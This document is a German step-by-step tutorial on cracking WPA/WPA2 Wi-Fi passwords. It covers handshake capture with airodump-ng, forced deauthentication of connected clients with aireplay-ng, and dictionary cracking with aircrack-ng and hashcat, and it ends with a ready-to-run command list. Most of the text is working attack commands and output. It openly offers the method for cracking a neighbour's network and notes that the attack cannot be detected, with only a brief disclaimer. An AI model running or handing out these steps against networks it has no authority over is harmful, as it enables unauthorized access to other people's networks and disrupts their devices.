
Knacken Sie WPA/WPA2-WLAN-Router mit Airodump-ng und Aircrack-ng/Hashcat
Knacken von WPA/WPA2-Wi-Fi-Routern mit Airodump-ng und Aircrack-ng/Hashcat.
Dies ist eine kurze Schritt-für-Schritt-Anleitung, die zeigt, wie man Wi-Fi-Netzwerke knackt, die mit schwachen Passwörtern gesichert sind. Sie ist nicht vollständig, sollte aber genügend Informationen liefern, um die Sicherheit des eigenen Netzwerks zu testen oder ein benachbartes zu knacken. Der unten beschriebene Angriff ist vollständig passiv (nur Mithören, es wird nichts von Ihrem Computer gesendet) und kann nicht erkannt werden, sofern Sie das geknackte Passwort nicht tatsächlich verwenden. Ein optionaler aktiver Deauthentifizierungsangriff kann verwendet werden, um den Aufklärungsprozess zu beschleunigen und wird am Ende dieses Dokuments beschrieben.
Wenn Sie mit diesem Prozess vertraut sind, können Sie die Beschreibungen überspringen und direkt zur Liste der verwendeten Befehle am Ende springen. Für eine Vielzahl von Vorschlägen und alternativen Methoden siehe den Anhang. neal1991 und tiiime haben ebenfalls freundlicherweise Übersetzungen dieses Dokuments und des Anhangs ins Chinesische zur Verfügung gestellt, falls Sie diese Versionen bevorzugen.
HAFTUNGSAUSSCHLUSS: Diese Software/dieses Tutorial dient ausschließlich zu Bildungszwecken. Sie sollte nicht für illegale Aktivitäten verwendet werden. Der Autor ist nicht verantwortlich für die Nutzung. Seien Sie kein Idiot.
Dieses Tutorial setzt voraus, dass Sie:
sudo apt-get install aircrack-ngBeginnen Sie, indem Sie die drahtlosen Schnittstellen auflisten, die den Monitor-Modus unterstützen, mit:
airmon-ng
Wenn Sie keine aufgeführte Schnittstelle sehen, unterstützt Ihre WLAN-Karte den Monitor-Modus nicht 😞
Wir gehen davon aus, dass der Name Ihrer drahtlosen Schnittstelle wlan0 ist, aber stellen Sie sicher, dass Sie den korrekten Namen verwenden, falls er davon abweicht. Als Nächstes versetzen wir die Schnittstelle in den Monitor-Modus:
airmon-ng start wlan0
Führen Sie iwconfig aus. Sie sollten nun eine neue Monitor-Modus-Schnittstelle sehen (wahrscheinlich mon0 oder wlan0mon).
Beginnen Sie damit, 802.11-Beacon-Frames zu belauschen, die von nahegelegenen WLAN-Routern ausgesendet werden, unter Verwendung Ihrer Monitor-Schnittstelle:
airodump-ng mon0
Sie sollten eine Ausgabe ähnlich der folgenden sehen.
CH 13 ][ Elapsed: 52 s ][ 2017-07-23 15:49
BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
14:91:82:F7:52:EB -66 205 26 0 1 54e OPN belkin.2e8.guests
14:91:82:F7:52:E8 -64 212 56 0 1 54e WPA2 CCMP PSK belkin.2e8
14:22:DB:1A:DB:64 -81 44 7 0 1 54 WPA2 CCMP <length: 0>
14:22:DB:1A:DB:66 -83 48 0 0 1 54e. WPA2 CCMP PSK steveserro
9C:5C:8E:C9:AB:C0 -81 19 0 0 3 54e WPA2 CCMP PSK hackme
00:23:69:AD:AF:94 -82 350 4 0 1 54e WPA2 CCMP PSK Kaitlin's Awesome
06:26:BB:75:ED:69 -84 232 0 0 1 54e. WPA2 CCMP PSK HH2
78:71:9C:99:67:D0 -82 339 0 0 1 54e. WPA2 CCMP PSK ARRIS-67D2
9C:34:26:9F:2E:E8 -85 40 0 0 1 54e. WPA2 CCMP PSK Comcast_2EEA-EXT
BC:EE:7B:8F:48:28 -85 119 10 0 1 54e WPA2 CCMP PSK root
EC:1A:59:36:AD:CA -86 210 28 0 1 54e WPA2 CCMP PSK belkin.dca
Für die Zwecke dieser Demo wählen wir, das Passwort meines Netzwerks "hackme" zu knacken. Merken Sie sich die BSSID-MAC-Adresse und die Kanalnummer (CH), wie von airodump-ng angezeigt, da wir beide für den nächsten Schritt benötigen.
WPA/WPA2 verwendet einen 4-Wege-Handshake, um Geräte im Netzwerk zu authentifizieren. Sie müssen nichts darüber wissen, aber Sie müssen einen dieser Handshakes erfassen, um das Netzwerkpasswort zu knacken. Diese Handshakes treten immer dann auf, wenn ein Gerät eine Verbindung zum Netzwerk herstellt, zum Beispiel wenn Ihr Nachbar von der Arbeit nach Hause kommt. Wir erfassen diesen Handshake, indem wir airodump-ng anweisen, den Datenverkehr im Zielnetzwerk zu überwachen, unter Verwendung der Kanal- und BSSID-Werte, die mit dem vorherigen Befehl ermittelt wurden.
# Ersetzen Sie -c und --bssid durch die Werte Ihres Zielnetzwerks
# -w gibt das Verzeichnis an, in dem wir die Paketerfassung speichern
airodump-ng -c 3 --bssid 9C:5C:8E:C9:AB:C0 -w . mon0
CH 6 ][ Elapsed: 1 min ][ 2017-07-23 16:09 ]
BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
9C:5C:8E:C9:AB:C0 -47 0 140 0 0 6 54e WPA2 CCMP PSK ASUS
Jetzt warten wir... Sobald Sie einen Handshake erfasst haben, sollten Sie etwa [ WPA handshake: bc:d3:c9:ef:d2:67 oben rechts auf dem Bildschirm sehen, direkt rechts von der aktuellen Uhrzeit.
Wenn Sie ungeduldig sind und sich mit einem aktiven Angriff wohlfühlen, können Sie mit dem Zielnetzwerk verbundene Geräte zwingen, sich erneut zu verbinden, indem Sie bösartige Deauthentifizierungspakete an sie senden. Dies führt oft zur Erfassung eines 4-Wege-Handshakes. Siehe den Abschnitt über Deauth-Angriffe weiter unten für Informationen dazu.
Sobald Sie einen Handshake erfasst haben, drücken Sie ctrl-c, um airodump-ng zu beenden. Sie sollten eine .cap-Datei dort finden, wo Sie airodump-ng angewiesen haben, die Erfassung zu speichern (wahrscheinlich -01.cap). Wir werden diese Erfassungsdatei verwenden, um das Netzwerkpasswort zu knacken. Ich benenne diese Datei gerne um, um den Netzwerknamen widerzuspiegeln, den wir zu knacken versuchen:
mv ./-01.cap hackme.cap
Der letzte Schritt besteht darin, das Passwort mit dem erfassten Handshake zu knacken. Wenn Sie Zugang zu einer GPU haben, empfehle ich nachdrücklich die Verwendung von hashcat zum Passwortknacken. Ich habe ein einfaches Tool erstellt, das die Verwendung von hashcat sehr einfach macht, genannt naive-hashcat. Wenn Sie keinen Zugang zu einer GPU haben, gibt es verschiedene Online-GPU-Knackdienste, die Sie nutzen können, wie GPUHASH.me oder OnlineHashCrack. Sie können auch das CPU-Knacken mit Aircrack-ng versuchen.
Beachten Sie, dass beide unten stehenden Angriffsmethoden ein relativ schwaches, vom Benutzer erstelltes Passwort voraussetzen. Die meisten WPA/WPA2-Router werden mit starken, 12-stelligen Zufallspasswörtern ausgeliefert, die viele Benutzer (zu Recht) unverändert lassen. Wenn Sie versuchen, eines dieser Passwörter zu knacken, empfehle ich die Verwendung der Probable-Wordlists WPA-Length-Wörterbuchdateien.
naive-hashcat (empfohlen)Bevor wir das Passwort mit naive-hashcat knacken können, müssen wir unsere .cap-Datei in das äquivalente hashcat-Dateiformat .hccapx konvertieren. Dies können Sie ganz einfach tun, indem Sie entweder die .cap-Datei auf https://hashcat.net/cap2hccapx/ hochladen oder das cap2hccapx-Tool direkt verwenden.
cap2hccapx.bin hackme.cap hackme.hccapx
Als nächstes laden Sie naive-hashcat herunter und führen es aus:
# Herunterladen
git clone https://github.com/brannondorsey/naive-hashcat
cd naive-hashcat
# Herunterladen der 134 MB großen rockyou-Wörterbuchdatei
curl -L -o dicts/rockyou.txt https://github.com/brannondorsey/naive-hashcat/releases/download/data/rockyou.txt
# Crack! Baby! Crack!
# 2500 ist der hashcat-Hash-Modus für WPA/WPA2
HASH_FILE=hackme.hccapx POT_FILE=hackme.pot HASH_TYPE=2500 ./naive-hashcat.sh
Naive-hashcat verwendet verschiedene Wörterbuch-, Regel-, Kombinations- und Masken-Angriffe (intelligente Brute-Force) und kann Tage oder sogar Monate dauern, um gegen mittelstarke Passwörter zu laufen. Das geknackte Passwort wird in hackme.pot gespeichert, also überprüfen Sie diese Datei regelmäßig. Sobald Sie das Passwort geknackt haben, sollten Sie etwa Folgendes als Inhalt Ihrer POT_FILE-Datei sehen:
e30a5a57fc00211fc9f57a4491508cc3:9c5c8ec9abc0:acd1b8dfd971:ASUS:hacktheplanet
Wobei die letzten beiden Felder, getrennt durch :, der Netzwerkname bzw. das Passwort sind.
Wenn Sie hashcat ohne naive-hashcat verwenden möchten, siehe diese Seite für Informationen.
Aircrack-ng kann für sehr einfache Wörterbuchangriffe auf Ihrer CPU verwendet werden. Bevor Sie den Angriff ausführen, benötigen Sie eine Wortliste. Ich empfehle die berüchtigte rockyou-Wörterbuchdatei:
# Herunterladen der 134 MB großen rockyou-Wörterbuchdatei
curl -L -o rockyou.txt https://github.com/brannondorsey/naive-hashcat/releases/download/data/rockyou.txt
Beachten Sie, dass Sie das Passwort nicht knacken werden, wenn das Netzwerkpasswort nicht in der Wortdatei enthalten ist.
# -a2 gibt WPA2 an, -b ist die BSSID, -w ist die Wortdatei
aircrack-ng -a2 -b 9C:5C:8E:C9:AB:C0 -w rockyou.txt hackme.cap
Wenn das Passwort geknackt wird, sehen Sie eine KEY FOUND!-Meldung im Terminal, gefolgt von der Klartextversion des Netzwerkpassworts.
Aircrack-ng 1.2 beta3
[00:01:49] 111040 keys tested (1017.96 k/s)
KEY FOUND! [ hacktheplanet ]
Master Key : A1 90 16 62 6C B3 E2 DB BB D1 79 CB 75 D2 C7 89
59 4A C9 04 67 10 66 C5 97 83 7B C3 DA 6C 29 2E
Transient Key : CB 5A F8 CE 62 B2 1B F7 6F 50 C0 25 62 E9 5D 71
2F 1A 26 34 DD 9F 61 F7 68 85 CC BC 0F 88 88 73
6F CB 3F CC 06 0C 06 08 ED DF EC 3C D3 42 5D 78
8D EC 0C EA D2 BC 8A E2 D7 D3 A2 7F 9F 1A D3 21
EAPOL HMAC : 9F C6 51 57 D3 FA 99 11 9D 17 12 BA B6 DB 06 B4
Ein Deauth-Angriff sendet gefälschte Deauthentifizierungspakete von Ihrem Rechner an einen Client, der mit dem Netzwerk verbunden ist, das Sie zu knacken versuchen. Diese Pakete enthalten gefälschte "Absender"-Adressen, die sie für den Client so aussehen lassen, als kämen sie vom Access Point selbst. Nach dem Empfang solcher Pakete trennen sich die meisten Clients vom Netzwerk und verbinden sich sofort wieder, was Ihnen einen 4-Wege-Handshake liefert, wenn Sie mit airodump-ng mithören.
Verwenden Sie airodump-ng, um einen bestimmten Access Point zu überwachen (mit -c Kanal --bssid MAC), bis Sie einen verbundenen Client (STATION) sehen. Ein verbundener Client sieht etwa so aus, wobei 64:BC:0C:48:97:F7 die Client-MAC ist.
CH 6 ][ Elapsed: 2 mins ][ 2017-07-23 19:15 ]
BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
9C:5C:8E:C9:AB:C0 -19 75 1043 144 10 6 54e WPA2 CCMP PSK ASUS
BSSID STATION PWR Rate Lost Frames Probe
9C:5C:8E:C9:AB:C0 64:BC:0C:48:97:F7 -37 1e- 1e 4 6479 ASUS
Lassen Sie nun airodump-ng laufen und öffnen Sie ein neues Terminal. Wir werden den Befehl aireplay-ng verwenden, um gefälschte Deauth-Pakete an unseren Opfer-Client zu senden, ihn so zur erneuten Verbindung mit dem Netzwerk zu zwingen und hoffentlich dabei einen Handshake zu erhaschen.
# -0 2 gibt an, dass wir 2 Deauth-Pakete senden möchten. Erhöhen Sie diese Zahl
# bei Bedarf, aber mit dem Risiko, die Netzwerkaktivität des Clients merklich zu unterbrechen
# -a ist die MAC des Access Points
# -c ist die MAC des Clients
aireplay-ng -0 2 -a 9C:5C:8E:C9:AB:C0 -c 64:BC:0C:48:97:F7 mon0
Sie können optional Deauth-Pakete an alle verbundenen Clients senden mit:
# allerdings respektieren nicht alle Clients Broadcast-Deauths
aireplay-ng -0 2 -a 9C:5C:8E:C9:AB:C0 mon0
Sobald Sie die Deauth-Pakete gesendet haben, gehen Sie zurück zu Ihrem airodump-ng-Prozess, und mit etwas Glück sollten Sie jetzt oben rechts etwa Folgendes sehen: [ WPA handshake: 9C:5C:8E:C9:AB:C0. Jetzt, da Sie einen Handshake erfasst haben, sollten Sie bereit sein, das Netzwerkpasswort zu knacken.
Nachfolgend finden Sie eine Liste aller Befehle, die zum Knacken eines WPA/WPA2-Netzwerks benötigt werden, in der richtigen Reihenfolge und mit minimaler Erklärung.
# Netzwerkgerät in den Monitor-Modus versetzen
airmon-ng start wlan0
# Auf alle nahegelegenen Beacon-Frames lauschen, um Ziel-BSSID und Kanal zu erhalten
airodump-ng mon0
# Mit dem Lauschen auf den Handshake beginnen
airodump-ng -c 6 --bssid 9C:5C:8E:C9:AB:C0 -w capture/ mon0
# Optional: Einen verbundenen Client deauthentifizieren, um einen Handshake zu erzwingen
aireplay-ng -0 2 -a 9C:5C:8E:C9:AB:C0 -c 64:BC:0C:48:97:F7 mon0
########## Passwort mit aircrack-ng knacken... ##########
# 134 MB große rockyou.txt-Wörterbuchdatei herunterladen, falls benötigt
curl -L -o rockyou.txt https://github.com/brannondorsey/naive-hashcat/releases/download/data/rockyou.txt
# Knacken mit aircrack-ng
aircrack-ng -a2 -b 9C:5C:8E:C9:AB:C0 -w rockyou.txt capture/-01.cap
########## Oder Passwort mit naive-hashcat knacken ##########
# cap in hccapx konvertieren
cap2hccapx.bin capture/-01.cap capture/-01.hccapx
# Mit naive-hashcat knacken
HASH_FILE=hackme.hccapx POT_FILE=hackme.pot HASH_TYPE=2500 ./naive-hashcat.sh
Die Resonanz auf dieses Tutorial war so groß, dass ich Vorschläge und zusätzliches Material von Community-Mitgliedern als Anhang hinzugefügt habe. Schauen Sie rein, um zu erfahren, wie man:
wlandump-ng Handshakes von allen umliegenden Netzwerken erfasstcrunch 100+ GB große Wortlisten dynamisch erstelltmacchanger Ihre MAC-Adresse spoofedEine chinesische Version des Anhangs ist ebenfalls verfügbar.
Ein großer Teil der hier präsentierten Informationen stammt aus Lewis Encarnacions fantastischem Tutorial. Danke auch an die großartigen Autoren und Betreuer, die an Aircrack-ng und Hashcat arbeiten.
Überwältigenden Dank an neal1991 und tiiime für die Übersetzung dieses Tutorials ins Chinesische. Weitere Erwähnungen an yizhiheng, hiteshnayak305, enilfodne, DrinkMoreCodeMore, hivie7510, cprogrammer1994, 0XE4, hartzell, zeeshanu, flennic, bhusang, tversteeg, gpetrousov, crowchirp und Shark0der, die ebenfalls Vorschläge und Tippfehlerkorrekturen auf Reddit und GitHub beigesteuert haben. Wenn Sie daran interessiert sind, einige vorgeschlagene Alternativen zu WPA2 zu hören, werfen Sie einen Blick auf die großartige Diskussion in diesem Hacker-News-Beitrag.